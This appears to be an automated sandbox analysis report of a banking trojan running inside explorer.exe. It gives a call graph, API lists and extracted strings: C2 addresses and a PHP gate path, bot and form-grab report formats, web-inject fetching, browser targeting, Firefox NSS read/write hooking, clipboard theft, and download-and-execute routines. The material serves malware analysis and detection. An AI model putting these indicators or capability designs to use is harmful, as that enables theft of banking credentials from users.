_DllMainCRTStartup 104784->104785 104786 df3b488 104784->104786 104843 df28bd0 21 API calls _DllMainCRTStartup 104785->104843 104787 df3b4ac 104786->104787 104795 df25340 LoadLibraryA GetProcAddress 104786->104795 104787->104774 104793->104776 104794->104779 104796 df25f4d 13 API calls 104795->104796 104797 df26053 _DllMainCRTStartup 104796->104797 104844 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104797->104844 104799 df26f23 104845 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104799->104845 104801 df26f36 104846 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104801->104846 104803 df26f49 104847 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104803->104847 104805 df26f5c 104848 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104805->104848 104807 df26f6f 104849 df2f3d0 MultiByteToWideChar MultiByteToWideChar 104807->104849 104809 df26f82 104810 df3b2c0 104809->104810 104850 df34f30 104810->104850 104813 df3b36d lstrcmpiA 104815 df3b381 _DllMainCRTStartup 104813->104815 104816 df3b38b lstrcmpiA 104813->104816 104814 df3b32d 104852 df3b270 CreateMutexA 104814->104852 104875 df3a010 79 API calls _DllMainCRTStartup 104815->104875 104818 df3b3ab lstrcmpiA 104816->104818 104819 df3b39f _DllMainCRTStartup 104816->104819 104821 df3b3bf _DllMainCRTStartup 104818->104821 104822 df3b3ce lstrcmpiA 104818->104822 104876 df39730 169 API calls 3 library calls 104819->104876 104820 df3b339 _DllMainCRTStartup 104820->104813 104826 df3b342 CreateThread 104820->104826 104877 df39730 169 API calls 3 library calls 104821->104877 104823 df3b3e2 _DllMainCRTStartup 104822->104823 104824 df3b3f1 lstrcmpiA 104822->104824 104878 df39730 169 API calls 3 library calls 104823->104878 104827 df3b405 _DllMainCRTStartup 104824->104827 104828 df3b414 lstrcmpiA 104824->104828 104857 df21c60 104826->104857 105057 df373b0 104826->105057 104879 df39730 169 API calls 3 library calls 104827->104879 104830 df3b439 CreateThread 104828->104830 104831 df3b428 _DllMainCRTStartup 104828->104831 104835 df3b45a 104830->104835 104880 df39730 169 API calls 3 library calls 104831->104880 104838 df3cbb0 LangCountryEnumProcEx 2 API calls 104835->104838 104841 df3b46c 104838->104841 104841->104774 104842 df3b437 104842->104835 104843->104787 104844->104799 104845->104801 104846->104803 104847->104805 104848->104807 104849->104809 104851 df34f3c GetModuleFileNameA PathFindFileNameA lstrcmpiA 104850->104851 104851->104813 104851->104814 104853 df3b29e GetLastError 104852->104853 104854 df3b28e CloseHandle 104852->104854 104855 df3b296 104853->104855 104856 df3b2ab CloseHandle 104853->104856 104854->104855 104855->104820 104856->104820 104881 df2ef20 104857->104881 104861 df21c9b _DllMainCRTStartup 104902 df28b60 104861->104902 104863 df21cb8 104905 df28a90 GetModuleHandleW GetProcAddress _DllMainCRTStartup 104863->104905 104865 df21cd9 104906 df28a90 GetModuleHandleW GetProcAddress _DllMainCRTStartup 104865->104906 104867 df21cfa _DllMainCRTStartup 104868 df3cbb0 LangCountryEnumProcEx 2 API calls 104867->104868 104869 df21d13 104868->104869 104870 df35580 104869->104870 104914 df353e0 104870->104914 104876->104818 104877->104822 104878->104824 104879->104828 104880->104842 104907 df2edf0 GetWindowsDirectoryW 104881->104907 104884 df2ef9b _DllMainCRTStartup 104885 df2efa9 CreateDirectoryW SetFileAttributesW 104884->104885 104886 df2efd2 _DllMainCRTStartup 104885->104886 104887 df3cbb0 LangCountryEnumProcEx 2 API calls 104886->104887 104888 df21c83 104887->104888 104889 df2f170 CreateFileW 104888->104889 104890 df2f1b3 104889->104890 104891 df2f1c0 _DllMainCRTStartup 104889->104891 104890->104861 104892 df2f1dd GetProcessHeap HeapAlloc 104891->104892 104893 df2f202 ReadFile 104892->104893 104894 df2f240 CloseHandle 104892->104894 104895 df2f229 GetProcessHeap HeapFree 104893->104895 104896 df2f21f 104893->104896 104897 df2f2ec 104894->104897 104895->104894 104896->104895 104898 df2f24d _DllMainCRTStartup 104896->104898 104897->104861 104899 df2f2db CloseHandle 104898->104899 104900 df2f291 GetProcessHeap HeapAlloc 104898->104900 104901 df2f28f __init_ctype 104898->104901 104899->104897 104900->104899 104900->104901 104901->104899 104903 df28610 _DllMainCRTStartup Sleep 104902->104903 104904 df28b6d _DllMainCRTStartup 104903->104904 104904->104863 104905->104865 104906->104867 104908 df2ee4d GetVolumeInformationW 104907->104908 104910 df2eea2 _DllMainCRTStartup 104908->104910 104911 df2eed7 wsprintfW 104910->104911 104912 df3cbb0 LangCountryEnumProcEx 2 API calls 104911->104912 104913 df2ef0b SHGetFolderPathW 104912->104913 104913->104884 104915 df35425 _ld12tod 104914->104915 104916 df3548d GetUserNameW GetComputerNameW 104915->104916 104938 df2f310 104916->104938 104918 df354c5 104919 df2f310 _DllMainCRTStartup 3 API calls 104918->104919 104920 df354d4 GetNativeSystemInfo GetVersionExA wsprintfA 104919->104920 104945 df29200 104920->104945 104923 df3cbb0 LangCountryEnumProcEx 2 API calls 104924 df35566 104923->104924 104925 df34f60 104924->104925 104926 df34f90 lstrcpyA 104925->104926 104927 df29200 _DllMainCRTStartup 49 API calls 104926->104927 104931 df34fd1 _DllMainCRTStartup 104927->104931 104928 df35057 free 105034 df60c98 104928->105034 104930 df3506b SleepEx 104931->104928 104932 df35000 StrChrA 104931->104932 104933 df34ff0 104931->104933 104936 df35021 _DllMainCRTStartup 104932->104936 104934 df353e0 _DllMainCRTStartup 58 API calls 104933->104934 104935 df34ff5 104934->104935 104935->104928 104936->104928 104936->104932 105023 df352d0 104936->105023 104939 df2f326 WideCharToMultiByte 104938->104939 104940 df2f31e 104938->104940 104941 df2f371 malloc 104939->104941 104942 df2f35f 104939->104942 104940->104918 104943 df2f3b2 104941->104943 104944 df2f388 WideCharToMultiByte 104941->104944 104942->104918 104943->104918 104944->104943 104946 df2935a memcpy lstrlenA 104945->104946 104950 df2923d __lock_fhandle _DllMainCRTStartup 104945->104950 104965 df2f0f0 104946->104965 104951 df2925b lstrcpyA 104950->104951 105017 df2ecd0 GetWindowsDirectoryA GetVolumeInformationA 104951->105017 104952 df293da 104955 df2f0f0 _DllMainCRTStartup lstrlenA 104952->104955 104957 df293ef 104955->104957 104956 df27070 _DllMainCRTStartup 40 API calls 104963 df2930c 104956->104963 104958 df3cbb0 LangCountryEnumProcEx 2 API calls 104957->104958 104961 df29414 free 104958->104961 104959 df27070 _DllMainCRTStartup 40 API calls 104962 df293a1 104959->104962 104960 df2933f _mtinitlocknum 104960->104946 104961->104923 104962->104952 104962->104959 104963->104960 104964 df27070 _DllMainCRTStartup 40 API calls 104963->104964 104964->104963 104966 df2f0f4 104965->104966 104967 df29397 104965->104967 104968 df2f112 lstrlenA 104966->104968 104969 df27070 104967->104969 104968->104967 104968->104968 104970 df34f30 _ld12tod 104969->104970 104971 df270b3 6 API calls 104970->104971 104972 df27190 lstrcatA WSAStartup 104971->104972 104973 df27136 104971->104973 104975 df271e4 socket 104972->104975 104976 df27665 104972->104976 104973->104972 104974 df2713c lstrcatA wsprintfA lstrcatA lstrcatA 104973->104974 104974->104972 104975->104976 104977 df27205 gethostbyname 104975->104977 104978 df2766f free 104976->104978 104977->104976 104979 df27218 memcpy htons 104977->104979 104981 df2767b closesocket WSACleanup 104978->104981 104980 df27255 _DllMainCRTStartup 104979->104980 104980->104976 104983 df2725e lstrlenA send 104980->104983 104982 df3cbb0 LangCountryEnumProcEx 2 API calls 104981->104982 104984 df276c4 104982->104984 104983->104976 104985 df27289 104983->104985 104984->104962 104986 df27292 send 104985->104986 105008 df272aa _ld12tod _DllMainCRTStartup 104985->105008 104986->104976 104986->105008 104987 df272f0 recv 104987->104976 104987->105008 104988 df276d5 105022 df3ce28 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 104988->105022 104990 df27355 lstrcmpiA 104990->104976 104990->105008 104991 df2737a lstrlenA 104992 df27449 104991->104992 104991->105008 104994 df27452 104992->104994 104996 df27464 malloc 104992->104996 104997 df275fc 104992->104997 104993 df276da 104994->104976 104995 df2745a 104994->104995 104995->104996 104998 df274a0 recv 104996->104998 105000 df27601 malloc 104997->105000 105001 df2764c malloc 104997->105001 104998->104978 105013 df274c5 _DllMainCRTStartup 104998->105013 104999 df273ad lstrcmpiA 105002 df273ee lstrcmpiA 104999->105002 104999->105008 105003 df27620 recv 105000->105003 105001->104981 105004 df27402 lstrcmpiA 105002->105004 105002->105008 105003->104976 105005 df2763d 105003->105005 105004->105008 105005->105003 105006 df27644 105005->105006 105006->104981 105007 df275e0 105007->104978 105008->104976 105008->104987 105008->104988 105008->104990 105008->104991 105008->104999 105009 df276cf 105021 df3ce28 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 105009->105021 105011 df276d4 105011->104988 105012 df275e5 105012->104981 105013->104978 105013->104998 105013->105007 105013->105009 105013->105012 105014 df2754a realloc 105013->105014 105015 df27570 recv 105013->105015 105016 df2759a recv 105013->105016 105014->105013 105015->104978 105015->105013 105016->104978 105016->105013 105018 df2ed76 _DllMainCRTStartup 105017->105018 105019 df3cbb0 LangCountryEnumProcEx 2 API calls 105018->105019 105020 df2929c lstrcpyA lstrcatA lstrcatA 105019->105020 105020->104956 105021->105011 105022->104993 105024 df35391 _ld12tod 105023->105024 105029 df352f6 _ld12tod 105023->105029 105027 df35070 _DllMainCRTStartup 54 API calls 105024->105027 105025 df353bc 105026 df3cbb0 LangCountryEnumProcEx 2 API calls 105025->105026 105028 df353cc 105026->105028 105027->105025 105028->104936 105029->105025 105036 df35070 105029->105036 105035 df60c85 105034->105035 105035->105034 105037 df350b7 _ld12tod 105036->105037 105038 df350ee lstrlenA InternetCrackUrlA 105037->105038 105039 df35262 105038->105039 105041 df35135 _ld12tod 105038->105041 105040 df3cbb0 LangCountryEnumProcEx 2 API calls 105039->105040 105042 df352b6 105040->105042 105041->105039 105043 df27070 _DllMainCRTStartup 40 API calls 105041->105043 105042->105025 105052 df2f010 105042->105052 105046 df3517b _DllMainCRTStartup 105043->105046 105044 df3529a free 105044->105039 105045 df3519d PathFindFileNameA 105045->105044 105047 df351b7 GetTempPathA GetTempFileNameA lstrcatA lstrcatA CreateFileA 105045->105047 105046->105044 105046->105045 105047->105044 105048 df35228 WriteFile 105047->105048 105049 df35291 CloseHandle 105048->105049 105050 df35249 free CloseHandle 105048->105050 105049->105044 105050->105039 105051 df35269 ShellExecuteA 105050->105051 105051->105039 105051->105049 105053 df2ecd0 _DllMainCRTStartup 4 API calls 105052->105053 105054 df2f052 8 API calls 105053->105054 105055 df3cbb0 LangCountryEnumProcEx 2 API calls 105054->105055 105056 df2f0db DeleteFileA CopyFileA SetFileAttributesA 105055->105056 105056->105025 105065 df373da _DllMainCRTStartup 105057->105065 105059 df37b00 37 API calls 105067 df37418 _DllMainCRTStartup 105059->105067 105060 df22c10 77 API calls _DllMainCRTStartup 105060->105065 105061 df37b50 7 API calls 105061->105067 105062 df22c10 77 API calls _DllMainCRTStartup 105062->105067 105063 df21100 37 API calls _DllMainCRTStartup 105063->105067 105064 df37a90 37 API calls 105064->105065 105065->105060 105065->105064 105066 df3790b Sleep 105065->105066 105065->105067 105068 df37960 OpenClipboard 105065->105068 105066->105065 105067->105059 105067->105061 105067->105062 105067->105063 105067->105065 105067->105066 105069 df379d4 105068->105069 105070 df3797b GetClipboardData 105068->105070 105080 df22c10 105069->105080 105072 df37991 GlobalLock 105070->105072 105073 df379ab CloseClipboard 105070->105073 105072->105073 105076 df3799f GlobalUnlock 105072->105076 105073->105069 105074 df379bb 105073->105074 105079 df21100 37 API calls _DllMainCRTStartup 105074->105079 105076->105073 105078 df379c6 105078->105065 105079->105078 105081 df22c2d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 105080->105081 105084 df22070 105081->105084 105083 df22c64 105083->105065 105085 df22099 _DllMainCRTStartup 105084->105085 105086 df22136 105085->105086 105088 df220a2 _DllMainCRTStartup 105085->105088 105101 df22030 37 API calls _DllMainCRTStartup 105086->105101 105090 df220c4 105088->105090 105091 df220dc 105088->105091 105098 df223e0 77 API calls _DllMainCRTStartup 105090->105098 105100 df21e80 37 API calls _DllMainCRTStartup 105091->105100 105094 df220cd 105099 df22360 77 API calls _DllMainCRTStartup 105094->105099 105096 df220da 105097 df220e7 char_traits _DllMainCRTStartup 105096->105097 105097->105083 105098->105094 105099->105096 105100->105097 105102 e0ed790 105103 e0ed7ac 105102->105103 105107 e0ed7b1 105102->105107 105116 e0f3d74 GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 __security_init_cookie 105103->105116 105105 e0ed806 105106 e0ed83c 105106->105105 105118 e0eb480 105106->105118 105107->105105 105107->105106 105117 e0ed638 78 API calls 15 library calls 105107->105117 105109 e0ed85a 105112 e0eb480 _DllMainCRTStartup 287 API calls 105109->105112 105115 e0ed883 105109->105115 105113 e0ed876 105112->105113 105127 e0ed638 78 API calls 15 library calls 105113->105127 105115->105105 105128 e0ed638 78 API calls 15 library calls 105115->105128 105116->105107 105117->105106 105119 e0eb4a0 _DllMainCRTStartup 105118->105119 105121 e0eb488 105118->105121 105164 e0d8bd0 21 API calls _DllMainCRTStartup 105119->105164 105120 e0eb4ac 105120->105109 105121->105120 105163 e0d5340 17 API calls _DllMainCRTStartup 105121->105163 105124 e0eb491 105129 e0eb2c0 105124->105129 105127->105115 105128->105105 105165 e0e4f30 105129->105165 105132 e0eb36d lstrcmpiA 105134 e0eb38b lstrcmpiA 105132->105134 105135 e0eb381 _DllMainCRTStartup 105132->105135 105133 e0eb32d 105167 e0eb270 CreateMutexA 105133->105167 105137 e0eb39f _DllMainCRTStartup 105134->105137 105138 e0eb3ab lstrcmpiA 105134->105138 105174 e0ea010 79 API calls _DllMainCRTStartup 105135->105174 105175 e0e9730 169 API calls 3 library calls 105137->105175 105140 e0eb3ce lstrcmpiA 105138->105140 105141 e0eb3bf _DllMainCRTStartup 105138->105141 105139 e0eb339 105139->105132 105142 e0eb33d _DllMainCRTStartup 105139->105142 105143 e0eb3e2 _DllMainCRTStartup 105140->105143 105144 e0eb3f1 lstrcmpiA 105140->105144 105176 e0e9730 169 API calls 3 library calls 105141->105176 105146 e0eb342 CreateThread 105142->105146 105177 e0e9730 169 API calls 3 library calls 105143->105177 105147 e0eb414 lstrcmpiA 105144->105147 105148 e0eb405 _DllMainCRTStartup 105144->105148 105172 e0d1c60 21 API calls 2 library calls 105146->105172 105150 e0eb428 _DllMainCRTStartup 105147->105150 105151 e0eb439 CreateThread 105147->105151 105178 e0e9730 169 API calls 3 library calls 105148->105178 105179 e0e9730 169 API calls 3 library calls 105150->105179 105155 e0eb45a 105151->105155 105181 e0e73b0 105151->105181 105154 e0eb368 105173 e0e5580 86 API calls _DllMainCRTStartup 105154->105173 105180 e0ecbb0 IsProcessorFeaturePresent RtlLookupFunctionEntry __crtCapturePreviousContext 105155->105180 105161 e0eb46c 105161->105109 105162 e0eb437 105162->105155 105163->105124 105164->105120 105166 e0e4f3c GetModuleFileNameA PathFindFileNameA lstrcmpiA 105165->105166 105166->105132 105166->105133 105168 e0eb29e GetLastError 105167->105168 105169 e0eb28e CloseHandle 105167->105169 105170 e0eb296 105168->105170 105171 e0eb2ab CloseHandle 105168->105171 105169->105170 105170->105139 105171->105139 105172->105154 105175->105138 105176->105140 105177->105144 105178->105147 105179->105162 105180->105161 105184 e0e73da _DllMainCRTStartup 105181->105184 105183 e0d2c10 77 API calls _DllMainCRTStartup 105183->105184 105184->105183 105188 e0e7a90 37 API calls 105184->105188 105190 e0e790b Sleep 105184->105190 105191 e0e7418 _DllMainCRTStartup 105184->105191 105192 e0e7960 OpenClipboard 105184->105192 105185 e0d2c10 77 API calls _DllMainCRTStartup 105185->105191 105186 e0d1100 37 API calls _DllMainCRTStartup 105186->105191 105187 e0e7b00 37 API calls 105187->105191 105188->105184 105189 e0e7b50 7 API calls 105189->105191 105190->105184 105191->105184 105191->105185 105191->105186 105191->105187 105191->105189 105191->105190 105193 e0e797b GetClipboardData 105192->105193 105194 e0e79d4 105192->105194 105196 e0e79ab CloseClipboard 105193->105196 105197 e0e7991 GlobalLock 105193->105197 105204 e0d2c10 105194->105204 105196->105194 105200 e0e79bb 105196->105200 105197->105196 105199 e0e799f GlobalUnlock 105197->105199 105198 e0e79e3 105198->105184 105199->105196 105203 e0d1100 37 API calls _DllMainCRTStartup 105200->105203 105202 e0e79c6 105202->105184 105203->105202 105205 e0d2c2d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 105204->105205 105208 e0d2070 105205->105208 105207 e0d2c64 105207->105198 105209 e0d2099 _DllMainCRTStartup 105208->105209 105210 e0d2136 105209->105210 105211 e0d20a2 _DllMainCRTStartup 105209->105211 105225 e0d2030 37 API calls _DllMainCRTStartup 105210->105225 105214 e0d20dc 105211->105214 105215 e0d20c4 105211->105215 105224 e0d1e80 37 API calls _DllMainCRTStartup 105214->105224 105222 e0d23e0 77 API calls _DllMainCRTStartup 105215->105222 105218 e0d20cd 105223 e0d2360 77 API calls _DllMainCRTStartup 105218->105223 105220 e0d20da 105221 e0d20e7 char_traits _DllMainCRTStartup 105220->105221 105221->105207 105222->105218 105223->105220 105224->105221

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0DF25340 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                                  • API String ID: 2683923594-1492645186
                                                                                                                                                                                                                                  • Opcode ID: 2cf7b99535ff4509c01cef5f458d73deaeda5a23fe5aa195646fd786619906e5
                                                                                                                                                                                                                                  • Instruction ID: fea45bafde37fbe53021aa56afda04cbd80efef9a96567f4e7d4ecd89cae5a52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cf7b99535ff4509c01cef5f458d73deaeda5a23fe5aa195646fd786619906e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2031938602F4295EB419B91F89476633A8BB49BA5F64D237C94F83B34EF78C194D360
                                                                                                                                                                                                                                  Function 0DF217F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                                  • API String ID: 3240663557-511764017
                                                                                                                                                                                                                                  • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction ID: 4cf1c4252f9cf807aafb07b369c54c86ecb50f2502626e5597059e552fe528b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9C14332604B4686EB14DFA6E8547BA77A1FB89B88F448126DE4F47B18DF38C549C710
                                                                                                                                                                                                                                  Function 0DF27070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 383 df27070-df27134 call df34f30 lstrcpyA lstrcatA * 5 386 df27190-df271de lstrcatA WSAStartup 383->386 387 df27136-df2713a 383->387 389 df271e4-df271ff socket 386->389 390 df27665 386->390 387->386 388 df2713c-df2718a lstrcatA wsprintfA lstrcatA * 2 387->388 388->386 391 df2766c 389->391 392 df27205-df27212 gethostbyname 389->392 390->391 393 df2766f-df27675 free 391->393 392->391 394 df27218-df27258 memcpy htons call df60c68 392->394 396 df2767b-df276ce closesocket WSACleanup call df3cbb0 393->396 394->391 399 df2725e-df27283 lstrlenA send 394->399 399->391 401 df27289-df27290 399->401 402 df27292-df272a4 send 401->402 403 df272aa-df272e1 call df34f30 401->403 402->391 402->403 406 df272f0-df2730b recv 403->406 406->391 407 df27311-df27314 406->407 408 df2742a-df27439 407->408 409 df2731a-df27323 407->409 408->391 411 df2743f-df27444 408->411 409->408 410 df27329-df27332 409->410 410->408 412 df27338-df2733f 410->412 411->406 413 df276d5-df276da call df3ce28 412->413 414 df27345-df27353 412->414 416 df27355-df2736b lstrcmpiA 414->416 417 df2737a-df2738f lstrlenA 414->417 416->391 421 df27371-df27375 416->421 418 df27395-df273ab call df60c28 417->418 419 df27449-df27450 417->419 431 df27424 418->431 432 df273ad-df273c6 lstrcmpiA 418->432 422 df27452-df27454 419->422 423 df2745c-df2745e 419->423 424 df27426 421->424 422->391 426 df2745a 422->426 427 df27464-df27498 malloc 423->427 428 df275fc-df275ff 423->428 424->408 426->427 430 df274a0-df274bf recv 427->430 433 df27601-df2761c malloc 428->433 434 df2764c-df27663 malloc 428->434 430->393 435 df274c5-df274c7 430->435 431->424 436 df273c8-df273e6 call df60c38 432->436 437 df273ee-df27400 lstrcmpiA 432->437 438 df27620-df2763b recv 433->438 434->396 439 df275ce-df275d0 435->439 440 df274cd-df274d5 435->440 436->391 450 df273ec 436->450 437->431 442 df27402-df27420 lstrcmpiA 437->442 438->391 443 df2763d-df27642 438->443 446 df275d3-df275da 439->446 440->439 444 df274db-df274e3 440->444 442->431 443->438 447 df27644-df2764a 443->447 444->439 449 df274e9-df274f0 444->449 446->430 448 df275e0 446->448 447->396 448->393 451 df274f6-df27528 call df60c38 449->451 452 df276cf-df276d4 call df3ce28 449->452 450->431 451->393 457 df2752e-df27530 451->457 452->413 457->393 458 df27536 457->458 459 df275e5-df275f7 458->459 460 df2753c-df27548 458->460 459->396 461 df27562-df27568 460->461 462 df2754a-df2755e realloc 460->462 463 df27570-df2758e recv 461->463 462->461 463->393 464 df27594-df27598 463->464 464->463 465 df2759a-df275b3 recv 464->465 465->393 466 df275b9-df275cc 465->466 466->446
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4277384649-0
                                                                                                                                                                                                                                  • Opcode ID: d835f0f9f0d530a6b33a8ee7740b463374d98f2066bcac00140a0b50f44e64af
                                                                                                                                                                                                                                  • Instruction ID: 17700f62de906f8cf8b7ebee4262370bb2d25be2a0d9e2cefb3529f1f158aa3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d835f0f9f0d530a6b33a8ee7740b463374d98f2066bcac00140a0b50f44e64af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F18072704A9286DB30EF69E8847BA77A1F748B89F54D12ACA4B87F54DF78C148C710
                                                                                                                                                                                                                                  Function 0DF35070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0DF35112
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 0DF35127
                                                                                                                                                                                                                                    • Part of subcall function 0DF27070: lstrcpyA.KERNEL32 ref: 0DF270CE
